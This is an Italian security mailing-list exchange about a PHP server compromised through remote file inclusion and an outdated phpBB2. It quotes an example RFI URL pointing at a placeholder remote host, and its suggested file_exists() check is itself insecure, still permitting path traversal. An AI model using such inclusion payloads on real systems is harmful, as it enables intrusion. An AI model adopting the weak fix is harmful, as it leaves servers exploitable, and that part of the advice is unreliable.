-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Roberto Tagliaferri - Tosnet srl wrote: > I clienti qualche giorno fa mi segnalano la rete bloccata.. dopo qualche > oretta di controlli trovo che un server è passato da un 1000 > pacchetti/sec a più di 800.000.. > Faccio altri controlli e trovo un po' di schifezze passate tramite > url_fopen di php e tramite un phpBB2 vecchio di n anni e un paio di irc > che girano allegri. > > l'idea iniziale è ovviamente quella di spianare il tutto però mi > ricordavi di aver tenuto d'occhio quel server per quanto riguarda le > cose importanti (kernel, librerie varie ecc ecc) e infatti il > serveruccio irc è lanciato come nobody. > Quindi metto in sicurezza gli script (leggi:li razzo di brutto) e faccio > dei test con i soliti programmini. > Per rkhunter e per chkrootkit è tutto a posto, controllando con dei > binari corretti le date dei vari ls, netstat ecc sono coerenti (e > d'altra parte rkhunter controlla gli md5 della distribuzione), dopo > adeguata pulizia ci sono stati molti tentativi di caricare altre > schifezze, tentativi tutti falliti e nessun programma o porta sospetta > sono aperti. > Mi devo sentire relativamente tranquillo?
"Relativamente" probabilmente si :P > Un'altra cosa: passi per phpBB2 che aveva delle vulnerabilità > conosciute, ma come hanno trovato uno stupido script tipo > index.php?pag=intro (che genialata delle genialate prende il file intro > e lo visualizza), script che accetta anche una cosa tipo > index.php?pag=http://serverdelcavolo/id.txt? > > Lo fanno i vari bot? > Quindi se si toglie lo spam e questi tentativi a vuoto generalizzati la > rete sarebbe completamente scarica... Tentativi di RFI possono essere anche eseguiti da bot appositamente costruiti con alle spalle un database di dorks tramite cui provano violentemente ogni tentativo fino a che non riceve una risposta adeguata dal webserver. Altrimenti a mano poco ci vuole a vedere una potenziale vulnerabilità, basta una veloce navigata un semplice test e vedere se il server esegue il codice php iniettato. Più che togliere lo spam fixerei il bug in questione evitando far includere così liberamente file. Ci vuole poco alla fine, basta filtrare l'input tipo index.php?pag=1 $id = intval($_GET['id']); switch($id) { case '1': include("pagina.php"); break; default: include("default.php"); break; } Oppure basta che fai un if(file_exists("./" . $_GET['pag'])) Dovrebbe funzionare credo. Saluti cla -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFHGlcVVVYXVqV+ctMRAsPQAJ9cA0J3M8M0dacl35jmHrx+Iwez+QCfaGh+ sntkJh+akD1JpYhQ2ptu0L4= =Qzaa -----END PGP SIGNATURE----- ________________________________________________________ http://www.sikurezza.org - Italian Security Mailing List
